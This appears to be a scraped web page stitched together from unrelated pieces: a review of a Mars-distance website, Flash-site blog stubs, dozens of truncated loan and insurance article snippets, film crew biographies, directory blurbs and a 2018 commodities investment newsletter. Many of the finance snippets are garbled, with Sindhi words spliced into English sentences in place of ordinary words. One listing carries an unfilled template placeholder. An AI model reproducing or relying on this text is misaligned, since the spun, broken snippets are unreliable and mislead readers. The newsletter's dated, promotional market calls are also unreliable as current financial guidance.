I found this website by accident but it is amazing. I am not an astronomy lover but I still feel interested about it because this is a hot topic recently. The only focus for the site is to tell how far Mars is from the Earth. It supposes that “if the earth were 100 pixel wide”, and shows the distance by traveling. Also, it includes the moon. The simple design and simple goal I think could always attract more people.
There should not be any target group. Everyone will love it. Although it is about astronomy, the target group should not be astronomy lovers because this site is quite simple and direct. The main goal it to tell general people who has not clear idea about astronomy that how far it is to Mars. Maybe young people will feel more interested in it.
The design is quite simple without any extra decoration. The night sky with stars shows you are in universe. Simple earth, two dash circles, clear explanations…those are what I like. The earth, moon and mars are simply hand drawing. To have focus on information spreading, the color used for words is just white, which is professional and clear.
Same with the design, the functionality is also super simple. All you need to do is to click the arrow twice, one to go to the moon, and the other to go to the mars. The moon is used to show how far the mars is. When you traveling from the moon to the mars, some information will show up to avoid long boring time to wait. Users can easily feel that it is really a long way to go to the mars. If you want to try again, just simply click the arrow and travel one more time.
February 20, 2012 | by Ken Harper | Inspiration, Inspiration, Inspiration, Inspiration, Project Four, Project One, Project Three, Project Two | award-winning | Comments Off on 22 Awesome Flash Websites
There had been some debate lately about the future of Flash. Many people had predicted its death. The rise of touch-screen devices, many of which don’t support Flash technology, is a key player in this subject. Certainly, Flash offers some problems when it comes to updating and SEO, not to talk about the heaviness inherent to Flash projects. Aside from that, Flash offers a level of interaction with the user that other technologies hardly can achieve, altough this is changing.
HTML5 and CSS3 seem to be becoming the new standards in web design, but we can still find some great websites designed in Flash. In this post we compiled 22 awesome Flash websites. Check them out and decide for yourself if Flash should stay or disappear for good.
February 15, 2012 | by Ken Harper | Inspiration, Inspiration, Project Three, Project Two | Comments Off on Great Example of a Web Experience
May 6, 2010 | by chris azar | Inspiration, Project Two | Comments Off on look at those menus boogie!
April 28, 2010 | by ken harper | Inspiration, Project Two, unfathomable | Comments Off on The Future of Navigation? WebCam/Mic Required
The number one consideration when looking for personal finance should be how much of your hard-earned cash a loan is going to relieve you of. If you see a loaf of bread in a shop that costs 60p and a seemingly identical loaf right next to it for 90p, youd be faced with a question: Should I choose the cheaper one, or is it cheaper because theres something wrong with it, in which case should I go with the 90p one? Some people would instinctively buy the cheaper one, others th...
Credit Myths Like they say, "Knowledge is power." Many times people either act on false information or fail to act because they didn't know what could be done to their benefit. This is the case in many areas of life, but on the top of that list is money. And in the money category, you will find lots of misinformation about credit. There is so much to talk about on the topic of credit myths that an entire book could be dedicated to it. Let us start with the gran...
Mortgage payment protection cover can work but it has to be given some very serious consideration as there are exclusions within a policy that could mean you wouldnt be able to claim. And depending on where you purchase it, it can add thousands onto the cost of your mortgage if you choose wrongly. When taken out correctly, mortgage payment protection cover could pay out a tax free income each and every month usually starting from your 31st day of being out of work and con...
Many folks like to check out the complaints made against a homeowner insurance company before deciding whether to do business with that company. They can do this online. Possibly the best place to find information about claims filed against homeowner insurance companies is the Better Business Bureau. Simply visit the site, opt to check out a business, and enter the name and location of the homeowner insurance company you want to research. Once you find the company in qu...
Merchant account supports a trader or retailer in accepting credit cards and offering credit card processing service to the customer. This account enables all size of business whether large or small to offer credit card benefits to customers or buyers and is setup only after approval from merchant account service providers or banks. Credit card processing is transaction of cash via credit card account of a purchaser within seconds of swiping the card through credit card pr...
Through its affiliate of federal agencies, the government makes available a list of government grants. This list, which is free, is circulated to all state and federal organizations. How do these lists come about? Congress allocates federal grants for major projects and these are given to various government agencies. The projects can be suggested by anyone, from the President to the states or the constituents and they are usually projects that are for the betterment of the co...
It is a pleasant experience to own a house that you had dreamed for long. What if you feel burdened of the loan? How does it become a burden on you? The main reason for not being able to pay off the mortgage on time is the lack of financial planning or the choice of the wrong mortgage. While choosing the mortgage type, you need to consider a lot of decisive factors. Apart from your monthly income and expenses, you need to do a thorough study on the type of mortgages avail...
Getting a loan revolves most around two things: having a steady job and having a good credit score. While people with bad credit may have a tough time obtaining a loan to buy a house or to refinance their home loan, there are opportunities under certain circumstances for many of them to obtain an adverse remortgage. Lenders will typically look at what happened to a persons finances that threw them into their current or recent situation and judge each loan application on an i...
A student loan debt consolidation simplifies the process of repayment by combining all student loans into one easy payment. Student loans consolidation also gives students the opportunity to lock in their interest rate for the entire length of the loan. Because of these benefits, more students every year are considering the option, and it could be an alternative to multiple loan management worth pursuing. Students in the United States will find their student loans are cons...
Congratulations, ladies! If you are reading this, you are either already enrolled and attending classes at college, or youre taking special steps to make sure youre completely prepared when the day does come for you to say goodbye to Mom and Dad and head off to become a student of higher learning! Congratulate yourself beyond your college enrollment congratulate yourself for realizing now that youre a lady student, its time to ease up on the parents a bit and start t...
Loan payment protection insurance can give you an income with which to continue meeting your monthly loan repayments each month if you were to find yourself out of work due to suffering from an accident, long term sickness or unemployment by way of involuntary redundancy. While it can be a safety net the cover isnt suitable for all circumstances and if you want it to do the job its designed to do then you have to understand the product and the exclusions within a policy. ...
Did you know you could save money and get discount health insurance in New York by choosing to purchase certain kinds of coverage and opting to omit other kinds of protection? You probably did; سپني کان پوءِ, it only makes sense that paying for a portion of something is cheaper than paying for the entire thing. تنهن هوندي به, choosing this method to obtain affordable medical insurance in NY doesnt mean youre selling yourself short in terms of health care protection. By purchasing ...
Some expenses leave us with no choice other than to take loans. انهن ڏينهن, loan taking has become all the rage. People have lost their prejudice against loans and money lenders. انهن ڏينهن, loans are regarded as the easiest way of availing money for the tough times and the greater expenses. تنهن هوندي به, there is no point in securing a loan if one is later going to struggle to pay it off. We avail of loans to make life easier for ourselves. We would not apply for loans if we knew...
Finding the best insurance rate for your Arizona automobile does not have to be a difficult task. There are many tools provided by the internet to help make it easy. Here are a few automobile rate saving tips: 1.Arizona Department of Insurance: Visit the state insurance website to find out which insurers are licensed to do business in the state. There are also tips on what companies can and cannot do and pointers on how to reduce your rate. 2.Before buying a vehicle,...
Although at times it seems as if the credit card companies have dominance over everyone, Congress continues to remind us that they have the final say in the way things are run. With Congress looking at several issues that deals with credit card companies, there is sure to be some kind of regulations on policies in the coming years. As the internet continues to develop, more and more people are using credit cards for an array of different things. Credit cards are used for...
According to a study published in U.S. NEWS & WORLD REPORT, one out of every two people in Oregon over the age of 65 will need some form of long term health care. That same report went on to say that Medicare pays almost nothing toward long term care. When you also factor in that today more and more younger people, through either accident or illness, are finding themselves in need of one form of long term care or another it becomes painfully obvious that the need for disco...
Buying a holiday home is a big responsibility. You cant just buy a home and hope that things will turn out just the way you want them to be. To make sure that your investment in your holiday home is well protected, you should get a holiday home insurance upon purchase of the property. Always remember that when it comes to holiday insurance, timing is very important. Note that any incidents that happen prior to the issuance of the holiday insurance is no longer covered by the...
Every year, hundreds of thousands of people have to file a property damage claim with their insurance company and every year, more and more homeowners and business owners are turning to Property Insurance Claim Adjusters to handle this for them. The reason behind this is that policyholders are now learning that insurance companies have a tendency to underpay them on a property loss claim. Insurance Claim Adjusters are called by different names in different parts of the c...
The best way to make sure you always get really cheap car insurance, or as cheap as you can get depending on where you live, the type of car you drive, and your cars safety features, is to start from the very beginning. This means paying close attention to your driving record. Once you obtain your drivers license, you will have what is called a driving record. A driving record is sort of like a drivers report card; تنهن هوندي به, driving records only record the bad grades. An...
In the event of any unexpected accident or loss, in order to be able to tide over the same, individuals and companies opt for insurance policies. This is where the loss is transferred to a third party who bears the brunt. There are two parties involved in this agreement, the insurer and the insurance company where the policy has been taken. When a person dies, meets with an accident and becomes handicapped, or if the vehicle meets with an accident, are some cases where insura...
A flourishing city, Houston has a number of industries that range from the production of energy to high-tech firms, and is thus one of the biggest commercial hubs in the United States. A large population also makes Houston a home for many that struggle financially, and require the services of a Houston bankruptcy attorney. It makes sense to hire the services of a professional Houston bankruptcy attorney if one decides to file for bankruptcy in a bankruptcy court in Houston.
انگ اکر موجب, female drivers on average do things a bit differently than male drivers, جيئن ته: Drive safer cars Drive less expensive cars Drive cars modest in appearance Receive fewer traffic citations File fewer car insurance claims These are the reasons females tend to get cheap car insurance. This is not to say all females drive safer cars than males, or that all males receive more traffic citations than females. These are just statistics; h...
Income protection insurance is a viable form of protection insurance in this day and age. The cost of living in the UK actively rises every year and yet wages and salary packages do not seem to follow suit. نتيجي طور, it is easy to fall into poverty should anything happen to a vital member of a household and they became unable to work because of unforeseen redundancy, ڊگهي مدت پلنگن تي يا آ. The cost of living allows no room for manoeuvre, so you can either afford t...
Creating an evenly balanced investment portfolio by dividing assets among such diverse classes as stocks both foreign and domestic, ھٿيار, پاڻ پئسن, جائيداد جي خريد ۽ وڪرو, cash equivalents, and private equity can help guard against recessions. Determining how much to invest in each asset group depends upon the investors individual situation and future needs. Throughout most of American history it has been more profitable to invest in stocks rather than bonds. تنهن هوندي به, there hav...
Are you facing financial troubles? Have you tried to alleviate your debts by working with the companies, but not succeeding? There are many reasons for a person to enter into financial difficulties. It is possible that you or a spouse has lost a job, you have medical bills that need to be paid, or you have used credit cards to get by. If you have tried to work with your creditors to no avail you are probably beginning to look at the options of bankruptcy. There are six law...
Are you under a financial burden? Then find a way out; simple and easy with the array of facilities like credit cards and charge cards available today. These facilities can ease your tension to a great extent. But it all basically depends on the right card. Before selecting an appropriate card, consider some questions like Do I have good or bad credit? Do I normally pay balances in full or part payment? Do I travel a lot and use specific brands or select apparel from desig...
The overall sucess of the FOREX market is made possible today because of margin. Without this important principle, the average investor would not be able to participate in FOREX at all. So what is margin exactly? 1. Trading On A Margin In order to trade on a margin, you must set up a margin account. With a relatively small deposit you can start trading large amounts of currency. Establishing a margin account with a FOREX broker enables you to borrow money from the broke...
Getting a home loan is today far easier than it used to be even a few years back. Home loans are full and plenty. You can find the ideal loan a wide variety of home loans. If you are a homeowner you could look through some secured homeowner loans. ٻيو, home equity loans are also a good bet. But first of all, before you even embark on your journey towards that dirt-cheap loan, make sure you have decided what use you will be putting that money to. You certainly don't ...
There are exciting things on the horizon for Oregon auto insurance purchasers, things like Pay-As-You-Drive (PAYD) Auto Insurance which charges insurance premiums by the mile, potentially saving low-mileage drivers a fortune in insurance costs, but until such time as a PAYD plan is fully implemented, Oregon drivers will have to compare auto insurance rates just like everyone else in order to find the best deal. In Oregon there are three classifications into which a driver ...
I never really thought of weeds as being evil, but occasionally a plant finds its way into your garden and refuses to leave. It turns into a stubborn house guest, spreading its roots through every available patch of dirt, and paying no heed to existing plants in their quest for dominance. You'll spend an entire season pulling and possibly even spraying, but eventually you'll see them rearing their ugly heads, almost in defiance.
Not everything you hear is true about commercial real estate. Learn the biggest misconceptions and shed some new, honest light on this often intimidating business.
A walk-through is an important step in a real estate transaction. To get the most out of it, make sure you understand the terms of the purchase contract.
Due to steadily rising costs of living and the increase in financial commitments many people experiencing money problems. Often along with money problems there may also be worries about keeping employment due to downsizing and big layoffs. Some people have large outstanding debts and the financial burden is so great that they do not see a way out. If you are worried abut your financial situation and you would like to be debt free take heart! With the Law of Attraction y...
Going online to find the cheapest rates of interest and best deal when it comes to taking out a loan is one of the quickest ways of getting the best deal and a specialist website will make some of the best tools available to make the job of securing the cheapest rates of interest easy. One of the best tools is the online secured loan calculator, by using this tool you are able to search with the whole of the marketplace to make sure that you have to best loan possible. In...
Imagine paying off your mortgage, ڪريڊٽ ڪارڊ, ڪار قرضن, and all other debt in less than half the time. In the US alone there are over 125 million people in debt and that number continues to rise. The majority of them are $50,000 or more in debt including their mortgages, ڪار قرضن, ڪريڊٽ ڪارڊ & شاگرد قرضن. Every one of them face the prospect of paying off their debt over the course of 30+ years at an average interest cost of $150,000 يا وڌيڪ. Freedom Financial I...
Secured homeowner loans can be taken out for virtually any purpose but thought has to be given if the reason is worth putting the roof over your head in danger. A secured loan means that you will put something of extreme value up against the loan and in the case of a homeowner loan this is your home. The majority of lenders will use your homes equity when it comes to deciding how much you are able to borrow, but it means that throughout the term of the loan your home could be...
Loans are not as easy as scholarships and grants. It becomes a responsibility for many years after you graduate until you pay off the debt. And thats why it is very vital for you to study the student loan payment plans and options when you are looking for a loan. You should always go for the best, which does not burden you with very high interest rates and heavy payment methods. Regardless of what kind of loan you have, most of the times the student loan payment starts si...
In October 2007 the safety organization Tyresafe ran a campaign which highlighted how important the tyres of your car are to your safety, with claims on insurance policies resulting from accidents caused by worn or dangerous tyres. In order to emphasize this there has been a request that garages give out free checks to motorists such as checking the pressure of the tyres of drivers that are driving legally on the road with car insurance. So when you take out a cheap car ins...
When it comes to holiday buy to let insurance there is a lot to take into account. Of course you will need to have the best to suit your requirements and the essential cover, but you will also want to make sure that you are getting the best deal when it comes to taking holiday buy to let insurance. The best way to get your holiday buy to let insurance is to go with a specialist broker. By doing so the broker will be able to you the cheapest package that has all the necessa...
Follow a few simple guidelines, and marketing your own home can be easy. And it will save you thousands. The recent property boom has a lot of people thinking of selling. افسوس, the costs of selling can really eat into your profit. Theres nothing we can do about stamp duty, but one cost we can avoid is real estate agent fees. By selling your house yourself rather than paying a real estate agent, you can save you around $20,000 تي $500,000 sale.
Connecticut is close to all the major attractions in the Northeast, but has much to offer on its own. If youre looking for a little peace in the Northeast, Connecticut real estate is a good option.
Alicia Slimmer’s debut feature film, CREEDMORIA, took home the juried prize of Best Narrative Feature Film Comedy at Cinequest Film Festival, in March 2016. CREEDMORIA is a film Slimmer produced and wrote, borrowing many elements from her own life growing up in Queens, NY, in the 1980s. Her previous short film, MY FIRST CAR, premiered at Dances with Films Festival in LA and won Best Comedy at the 24th Annual New School Invitational Film Show. In 2015, Alicia joined two prestigious groups of women filmmakers: NYWIFT and Film Fatales. She has worked on many independent films as an actor, assistant director, set dresser, and producer. Entertainment Weekly posted an exclusive sneak peek of CREEDMORIA in February, 2016, and Slimmer was recently interviewed for the San Jose Mercury News exploring the hot topic: women filmmakers. Her indie approach has been highlighted in The Wall Street Journal online, Pulse, and Indiewire. CREEDMORIA is fiscally sponsored by IFP and part of Indiegogo’s pilot program, InDemand. She lives in Brooklyn with her husband Clifton Leaf, a magazine journalist and author, and their daughter.
Clifton Leaf is deputy editor at Fortune, where he directs the editorial content of the magazine and oversees the print staff. Previously, he served as a guest editor for the New York Times op-ed page and Sunday Review, and was executive editor at both the Wall Street Journal’s SmartMoney magazine and Fortune. He is also the author of the critically acclaimed book, The Truth in Small Doses: Why We’re Losing the War on Cancer—and How to Win It, which was recently named by Newsweek as one of “The Best Books About Cancer,” and which earned Cliff a Lifetime Achievement Award for cancer reporting from the European School of Oncology. A winner of the Gerald Loeb Award for Distinguished Business and Financial Journalism, the NIHCM’s Health Care Journalism Award, and a two-time finalist for the National Magazine Award, Cliff has received several leadership honors for his efforts in the cancer fight. A keynote speaker at more than three dozen scientific conferences around the world, he has presented testimony to the President’s Cancer Panel three times and delivered “Grand Rounds” at the National Cancer Institute—the only journalist to have ever received the honor.
Doneen was recently named Executive Vice President, Head Of Marketing For Columbia Records. In her new role, Doneen will oversee the Columbia Records’ marketing team, leading marketing campaigns for artists signed to Columbia Records and their affiliates. Previously, Doneen was Senior Vice President of Marketing at Columbia, guiding the latest campaigns for Adele and One Direction. Prior to that, she also headed Columbia’s TV Platform Marketing realm, handling the music campaigns for the hit GLEE franchise and EMPIRE. Appointed Senior Vice President of International Marketing for the Columbia/Epic Label Group in 2010, she helped develop and integrate global campaigns for artists including Beyonce, Shakira, Michael Jackson, AC/DC, Sara Bareilles, and others. Doneen joined Columbia’s marketing department in 2006, leading the emerging artist team and developing breakthrough projects including Adele’s 19, The Avett Brothers, and MGMT. Prior to joining Columbia, Doneen was Vice President of Marketing for Virgin Records. Doneen began her career in the music industry at Capitol Records in Los Angeles after graduating from Boston University.
Derek is a creative director, filmmaker and photographer based in New York. His work is centered on narrative; encompassing elements of music, fashion, design and technology with unique strategy. This includes work on multiple independent feature and short form films, including CREEDMORIA and the upcoming scripted series DON’T KILL MARY. As a producer, his focus is on building clear visual direction and cohesion into a production in order to help create indelible multi-sensory experiences that can survive this media dense environment. Derek is set to re-launch his agency HalfmanHalfmachine this year as a multi-faceted communication company that will have arms in television, web and print. He continues to work as a visual strategist for artists and brands, specifically in the entertainment space, music, art and fashion.
A New Yorker to the core, Machi was born in Brooklyn, raised in Queens and schooled in Manhattan and Yonkers. Creedmoria was the first feature film project he worked on after graduating from Sarah Lawrence with a B.A. in marketing (dreams do come true!). Machi spends his days project managing at Pilcrow (a full-service production and branding house) and his nights developing indie games.
Silvia is a New York City–based fashion designer. Upon receiving her degree from the Fashion Institute of Technology in 1991, she immediately began working as a design assistant. Her resume also includes being an Account & Product Development Manager for a large private label manufacturer as well as being the designer of her own Signature Clothing Line carried by upscale shops Fred Segal, Santa Monica and Steven Allen, New York, among others. Silvia's hands–on experience also includes fittings, pattern making and sewing. She has a keen eye for detail and an unfaltering love of vintage clothing. With an inventory of modern to classical clothing and accessories, she also has the ability of working within small budgets.
Raised in Boston, Boa Simon is an LA–based cinematographer. His narrative work has earned him awards from the American Society of Cinematographers, and the Academy of Television Arts and Sciences; his commercial work is broadcast internationally, and has won Imagen Awards & Webby Awards. Boa's cinematography for video artist Christopher Richmond has shown in galleries in Austria, Spain, Germany, and the U.S. Boa has taught a Cinematography course and has worked one-on-one with directors at the Manhattan Film Institute production program. In 2014 he joined Holotrope VR, developing a professional workflow to capture motion picture for virtual reality.
Ben is an award-winning filmmaker who has been editing, directing and producing motion pictures and television for the past eleven years. His television and commercial projects have aired on SpikeTV, Fuse, Food Network, IFC, ESPN and HBO online, with his narrative and documentary films screening in theaters and numerous festivals around the globe. A New York native, he currently lives in Marina Del Rey, CA, where he has been excitedly cutting CREEDMORIA and developing a number of new projects.
Beck began working in Off-Broadway theater bringing her unique vision to companies such as The Naked Angels and Blue Light Theater Company. Her credits also include costuming for the Lucy Moses program at Lincoln Center. Between 2008-2012 Beck co- owned a children’s Musical Theatre program in Los Angeles where she designed original costumes for over 18 musicals. Presently, she is designing costumes for Crossroads School for the Arts.
A native of New Jersey, Angelo Panetta graduated from William Paterson University with a Bachelor of Arts degree in Applied Music. Since forming the Radio Repertory Company of America, Angelo has produced and composed many episodes for the popular sci-fi series "Anne Manx,” which stars Claudia Christian (Babylon 5). In 2015 "Anne Manx" was selected as an Audie Awards finalist for Best Audio Drama by the Audio Publishers Association (APA). For the past 25 years Angelo has been designing sound effects, sound editing, re-recording mixing and composing music for TV, feature films, short films, commercials and video games. Angelo has supervised and directed talent such as, Eric Roberts (THE EXPENDABLES), Tom Bosley (HAPPY DAYS), Claudia Christian (BABYLON 5), PatriciaTallman (BABYLON 5), Andy Hallett (ANGEL), Katey Sagal (FUTURAMA and MARRIED WITH CHILDREN), Marina Sirtis (STAR TREK—THE NEXT GENERATION) and dozens more.
lala.com Lala - Where music plays - Lala matches the songs on your computer to our catalog, and adds them for free to your online.
learner.org Annenberg Media - Offers free teacher professional development, resources, and activities.
At 11am-12pm, 51% of Twitter users are looking at tweets, but only 31% are sending them. At 4pm-5pm, 56% of Twitter users are looking at tweets, but only 39% are sending them.
On Facebook, weekday usage is pretty steady, however Wednesday at 3:00 pm ET is consistently the busiest period. People are less active on Sunday compared to all other days of the week.
Tough love. Great Advice. Receive an one hour portfolio review and career coaching session online, or in person if you're in Seattle.
Patrick Neeman is a User Experience Director and a UX Instructor at General Assembly in Seattle, WA.
Receive an one hour portfolio review and career coaching session online, or in person if you visit me in the Pacific Northwest.
User Manual and User Guide for many equipments like mobile phones, photo cameras, motherboard, monitors, software, tv, dvd, and others..
We have listed all of the housing assistance programs that we have located in $city_name}, Indiana. Many are government and non profit housing assistance. Hopefully they can assist you in your search for help. If you know of any programs in Bloomington please contribute by Adding a New Listing Here.
Hoosier Hills Food Bank collects, stores and distributes food to non-profit agencies in Brown, Lawrence, Orange, Owen, Martin and Monroe counties in Indiana. Nearly 100 non-profit programs serve over 25,800 individuals each year with over 3.2 million pounds of food from the food bank. Since opening in 1982, HHFB has distributed over 30 million pounds of food.
US Food Banks is not associated with any government agency or nonprofit organization. We list US Food Banks centers throught the US.
Below we have listed all of the food banks in South Dakota. We have listed the cities on the right side of the page where we have found US Food Banks. If you see that we have missed a US Food Banks, please help us build our list by adding it here, Add a Food Bank.
Please note: The articles listed below contain historical material. The data provided was current at the time of publication. For current information regarding any of the funds mentioned in these presentations, please visit the appropriate fund performance page.
We've added a new section to Investor Alert! Click here to read this week's SWOT for the Blockchain and Digital Currency market.
On the campaign trail, then-presidential candidate Donald Trump pledged to invest as much as $1 trillion in U.S. infrastructure if he were elected. This week during his first State of the Union address, now-President Trump added half a trillion dollars more to that figure.
The hefty price tag likely raised some eyebrows among Congress members, but Trump is right in aiming high to fix the country’s “crumbling infrastructure,” as he calls it. According to the American Society of Civil Engineers (ASCE), the U.S. faces an infrastructure funding gap of more than $2 trillion between now and 2025, resulting in potential losses of nearly $4 trillion in gross domestic product (GDP), or $34,000 per household.
Take a look at public spending on U.S. streets and highways as a percent of GDP. Since the financial crisis a decade ago, investment has tanked, and anyone who regularly drives can see firsthand the consequences of this negligence. Americans spend 42 hours on average sitting in congestion every year, costing each driver roughly $1,400, and this week the American Roads & Transportation Builders Association (ARTBA) reports that more than 54,000 of the country’s 612,677 bridges are rated “structurally deficient.”
Anticipating a shift in priority toward infrastructure, contractors and construction firms are gearing up to take on new projects, with a whopping 75 percent of them planning to expand their headcount this year. This comes after an estimated 192,000 new construction jobs opened up every month in 2017, a figure that’s significantly up from the 88,000 new positions that came online every month only five years ago.
But contractors shouldn’t be the only ones getting ready for a new American construction boom. As I shared with you last month, the recipe calls for a broad commodities rally this year, and I would hate for investors to miss out. With global synchronized growth underway and demand outstripping supply in a number of cases, not to mention the U.S. dollar in decline and inflation on the rise, commodities are poised to be among the best performing asset classes in 2018.
Pay close attention to where commodities are relative to equities right now. Compared to the S&P 500 Index, materials are extremely undervalued, the most since at least 1970. This makes now a very attractive entry point—or as natural resource investors Goehring & Rozencwajg Associates writes in its quarterly report, there could be “a proverbial fortune to be made” if investors take advantage of this once-in-a-generation opportunity.
“When commodities are this cheap relative to stocks, the returns accruing to commodity investors have been spectacular,” the firm continues:
For example, had an investor bought the Goldman Sachs Commodity Index (or something equivalent) in 1970, by 1974 he would have compounded his money at 50 percent per year. From 1970 to 1980, commodities compounded annually in price by 20 percent. If that same investor had bought commodities in 2000, he would have also compounded his money at 20 percent for the next 10 years.
Past performance doesn’t guarantee future results, of course, but the implications here are very compelling if mean reversion takes place. There have been few times that I can remember when an asset class looked as favorable as commodities do now. If you agree, it might be time to consider adding exposure to materials, energy and mining to your portfolio.
Energy in particular looks very attractive. West Texas Intermediate (WTI) crude oil, the American benchmark, logged its best January since 2006, gaining more than 7 percent on scorching hot demand, sustained production cuts by the Organization of Petroleum Exporting Countries (OPEC), deteriorating output from Venezuela and a record-setting stockpile drawdown. U.S. oil inventories declined for 10 straight weeks as of January 24, the longest stretch ever recorded, before jumping again in the week ended January 31.
What’s more, the U.S. Energy Information Administration (EIA) just reported that, thanks to the revitalized shale revolution, the U.S. produced over 10 million barrels of oil per day in November, the first time it’s done so since 1970. This puts the country on a path to catch up with and possibly exceed Russia, which produced an average 11 million barrels a day in 2017, and world leader Saudi Arabia, whose energy behemoth Saudi Aramco produces around 12.5 million barrels a day.
As I’ve written many times before, the American fracking industry is largely responsible for keeping global oil prices low, which has been a huge windfall to the world economy. In its coverage of the news that U.S. output topped 10 million barrels, the Financial Times put it best, writing that American frackers have “boosted the U.S. economy, creating tens of thousands of jobs, bolstered its energy security, created new international relationships and given Washington new freedom to use sanctions as a tool for strategic influence.”
But shouldn’t all this extra supply halt the oil rally and put a damper on producer and explorer stocks? Not so fast.
In the years since oil prices cratered—and subsequently began to rise—energy companies have become much more efficient and have learned to do more with less. As the Financial Times notes, U.S. frackers are producing what they are today while employing only three quarters of the workforce they had in the days of $100-a-barrel oil. ExxonMobil, the largest American producer, is in expansion mode, with plans to ramp up its shale mining in the Permian Basin to 500,000 barrels a day by 2025.
It’s not just American companies that have grown lean and mean in this climate of lower oil prices. Says the chief financial officer of Royal Dutch Shell: “We are able to do the same for less.”
Europe’s largest producer this week reported that profits tripled in 2017, generating nearly as much cash flow as when oil prices hovered around $100.
According to the Wall Street Journal, the company has “fundamentally revamped the way it designs and executes projects and is working to deliver another $9 billion to $10 billion of savings in the coming years” through restructuring and by paying down loads of debt.
As a result, Shell has rewarded its shareholders well, delivering a dividend yield of nearly 6 percent, among the highest in the entire industry.
These rewards could continue, as Goldman Sachs now sees Brent jumping to $82.50 within the next six months, up from just under $70 today. Hedge funds’ net long position on Brent hit an all-time high of more than 584,000 contracts last week, according to ICE Futures Europe and reported by Bloomberg. WTI net long positions also surged, according to the U.S. Commodity Futures Trading Commission, to nearly 500,000 contracts, the most since 2006.
On a final note, Boeing—the world’s largest aircraft manufacturer—hit fresh new highs this week after the company crushed Wall Street expectations, reporting record operating cash flow of $13.4 billion for 2017, up more than a quarter percent from $10.5 billion in 2016. The company now forecasts operating cash flow of $15 billion by the end of 2018.
Core earnings per share (EPS) for the fourth quarter came in at $4.80, an incredible 94 percent increase from $2.47 during the same quarter in 2016. In 2017, Boeing delivered a record 763 commercial jets, and its backlog of orders stands at close to 6,000 aircraft, valued at $488 billion.
Boeing was the best performing stock in the Dow Jones Industrial Average last year, a trend that has continued into the new year.
As the Chicago Tribune reports, company stock has “more than doubled since the start of 2017 as Boeing surpassed General Electric to become the largest U.S. industrial company by market value.”
In my view, Boeing’s meteoric success is indicative of the overall health of the airline industry. That the company delivered so many new aircraft in 2017 and logged a high number of new orders suggests international carriers are optimistic about long-term air passenger and cargo demand.
In September, American Airlines CEO Doug Parker told CNBC he was very bullish on the industry’s ability to stay profitable, saying, “I don’t think we’re ever going to lose money again.”
A little skepticism would be forgiven here, but the sheer volume of new airline orders suggests other carriers feel the same way Parker does.
The major market indices finished down this week. The Dow Jones Industrial Average lost 4.12 percent. The S&P 500 Stock Index fell 3.85 percent, while the Nasdaq Composite fell 3.53 percent. The Russell 2000 small capitalization index lost 3.78 percent this week.
The Hang Seng Composite lost 2 percent this week; while Taiwan was down 0.19 percent and the KOSPI fell 1.92 percent.
Telecommunications was the best performing sector of the week, although decreasing by1.28 percent versus an overall decrease of 3.79 percent for the S&P 500.
Amazon beat Wall Street's expectations for its fourth quarter earnings, with $60.5 billion in revenue, up 38 percent year-over-year.
Energy was the worst performing sector for the week, decreasing 6.42 percent versus an overall decrease of 3.79 percent for the S&P 500.
Deutsche Bank posted a third straight annual loss. CEO John Cryan cited a "challenging market" as a reason for his bank's full-year loss of $621 million.
AMD beat across the board. The company’s results were boosted by a 60 percent explosion in computing and graphics sales.
Harley-Davidson is working on an electric motorcycle for 2019. The announcement came alongside the company's disappointing fourth-quarter earnings. Entering the growing electric vehicle market is an opportunity to grab market share.
Facebook said its users are spending a lot less time on the platform. The social-media company said the amount of time users were spending on the site declined by 50 million hours a day.
GDPR could wipe 2 percent from Google's revenues, according to Deutsche Bank. The European Union's new privacy and data protection act comes into force in May.
Total U.S. employee compensation rose in the fourth quarter and matched the biggest 12-month gain since 2008, as private-sector pay picked up, according to the Labor Department. Several industry groups registered wage increases of 3 percent or higher, including transportation and services such as leisure.
Nonfarm payrolls rose by 200,000 in January, beating analyst estimates, while the unemployment rate held at 4.1 percent.
Consumer optimism pushed higher than anticipated in January, after a surprise decline the previous month. The Conference Board's measure of consumer confidence rose to 125.4 in January, higher than the 123.1 anticipated by economists polled by Reuters.
State revenues are growing slower than the underlying economies, a divergence that highlights the fiscal challenges facing state governments, Fitch said. State tax collections grew slower and less consistently than real state GDP in the third quarter of 2017, with median state GDP growth of 3 percent, compared with 0.4 percent growth in state tax collections, according to Fitch.
Even with solid U.S. economic growth, construction spending rose in 2017 by the least in six years, as nonresidential building slowed and outlays by governments declined.
Productivity in the U.S. unexpectedly fell for the first time since early 2016 as working hours slightly outpaced output in the fourth quarter, highlighting a sluggish pace of efficiency gains during this expansion, a Labor Department report showed.
A weak U.S. dollar may make the municipal bond market more attractive to foreign investors, though hedging costs could become an issue. "International buyers are probably the fastest growing segment in the market," said Eric Friedland, director of municipal research at Lord Abbett. A weaker dollar "would probably bring more buyers into the muni market," he said.
The municipal bond market will benefit from new tax rules for life insurance companies, according to Anne Walsh, CIO for fixed income at Guggenheim Investments, which oversees $20 billion in municipals. "The tax cuts were interesting in that they created a new buyer of tax-exempt bonds, and that’s life insurance companies," Walsh said at a panel in New York City. Under new law, insurance companies pay tax on 30 percent of income from muni bonds, which could make the asset class more attractive to them. That’s a shift for companies that previously didn’t know how income from tax-exempt bonds would be treated until they calculated their final tax bills, a process that made them less interested in owning the securities, Walsh said. The potential pool of muni investors expanding to life insurance companies is a "very strong positive" for the muni market, she said.
Hartford, the Connecticut capital which narrowly escaped bankruptcy, had the outlook on its debt revised to "developing" from "negative," reflecting the creation of a new state oversight board that could provide financial assistance to the city, Moody’s said. The city's Caa3 rating was affirmed.
Illinois lawmakers voiced concerns about a proposal to issue $107 billion of pension-obligation bonds to shore up the state’s underfunded retirement system, which would be by far the biggest debt sale in the history of the municipal market. If it’s even feasible to go to market, “what is the opportunity cost to the state to issuing $100 billion in bonds in terms of going forward if we need to issue bonds for other things?" said Representative Scott Drury, a Democrat.
Public pension plans expect less and less from their investments: 21 percent of retirement plans for state and local government workers plan to reduce their assumed rate of return, according to a survey of 164 pension funds by the National Conference on Public Employee Retirement Systems. The average investment assumption was 7.5 percent and 2.9 percent inflation is expected, the NCPERS survey showed.
In an interview with Bloomberg, Janus Henderson fund manager Bill Gross said the U.S. jobs report should send the 10-Year Treasury yield to 3 percent and ensures the Federal Reserve will continue to hike rates, both of which are bearish scenarios for bonds.
This week spot gold closed at $1,331.51, down $18.19 per ounce, or 1.35 percent. Gold stocks, as measured by the NYSE Arca Gold Miners Index, ended the week lower by 5.85 percent. Junior-tiered stocks underperformed seniors for the week, as the S&P/TSX Venture Index came in off 8.88 percent. The U.S. Trade-Weighted Dollar reversed course at the end of the week and closed with a slight gain of 0.14 percent.
